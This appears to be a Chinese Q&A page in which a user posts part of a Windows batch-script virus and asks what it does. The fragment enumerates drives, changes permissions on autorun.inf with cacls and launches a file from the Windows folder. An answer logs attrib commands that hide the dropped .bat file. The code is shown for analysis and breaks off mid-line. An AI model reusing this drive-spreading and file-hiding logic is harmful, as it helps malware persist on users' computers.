谁帮我看看这段病毒代码

来源：百度知道编辑：UC知道时间：2024/09/21 02:35:31

谁帮我看看这段病毒代码,是什么意思.净创建了哪些文件.谢谢.最好谁帮我编个反病毒的东东我就更舒服了,嘿嘿

@echo OFF
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=1
set "endf=%systemdrive%\jmp.txt"
echo.Wscript.sleep 20000>sleep.vbe

if /i not "%cd%"=="%systemroot%" (call:cb&del/a/f/q sleep.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
"%systemroot%\U盘病毒分析Beta3.exe"
echo.Wscript.sleep 20000>sleep.vbe
:s
echo. >uishere-%v%.txt
if exist "%endf%" (goto end)
if "!dl:~%n%,1!"=="" (set n=0&sleep.vbe)
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (eCho.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf

批处理病毒和VBS脚本病毒？？？
在C盘Windows下生成了两个文件，
新建文本文档。bat 和新建文本文档.vbe

运行过程如下：

父级进程：
路径： C:\WINDOWS\system32\cmd.exe
PID: 2784
信息： Windows Command Processor (Microsoft Corporation)
子级进程：
路径： C:\WINDOWS\system32\attrib.exe
信息： Attribute Utility (Microsoft Corporation)
命令行：attrib "C:\Documents and Settings\Administrator\桌面\新建文本文档.bat" -s -h
（把文件设置成只读文件和系统文件）

父级进程：
路径： C:\WINDOWS\system32\cmd.exe
PID: 2784
信息： Windows Command Processor (Microsoft Corporation)
子级进程：
路径： C:\WINDOWS\system32\attrib.exe
信息： Attribute Utility (Microsoft Corporation)
命令行：attrib "C:\Documents and Settings\Administrator\桌面\新建文本文档.bat" +s +h

父级进程：
路径： C:\WINDOWS\system32\cmd.exe
PID: 2784
信息： Windows Command Processor (Mic

谁帮我看看这段代码? 请帮我看看这段代码帮我看看这段java代码帮我看看这段C代码帮我看看这段ASP代码帮我看看这段邮件代码帮我看看这段ASP代码～～！帮我看看这段代码帮我看看这段代码:(C++) 帮我看看这段javascript代码